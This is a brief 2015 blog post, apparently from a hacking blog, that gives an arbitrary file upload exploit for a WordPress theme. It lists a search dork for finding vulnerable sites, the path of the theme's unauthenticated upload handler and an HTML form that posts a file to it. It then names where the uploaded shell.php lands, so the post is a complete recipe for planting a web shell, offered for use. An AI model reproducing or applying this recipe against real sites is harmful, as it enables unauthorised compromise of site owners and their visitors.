23 July 2015
Author : Rumput
Dork : inurl:/wp-content/themes/NameThemes ( Use Brain )
Exploit : /wp-content/themes/NameThemes/includes/fileuploader/upload_handler.php
Csrf :
<form enctype="multipart/form-data"
action="http://oni.chan/wp-content/themes/NameThemes/includes/fileuploader/upload_handler.php" method="post">
Your File: <input name="qqfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
Shell :wp-content/uploads/years/month/shell.php
Ganbate Ne Cari Themesnya :v
Tag :
Hacking
Subscribe to:
Post Comments (Atom)
0 comments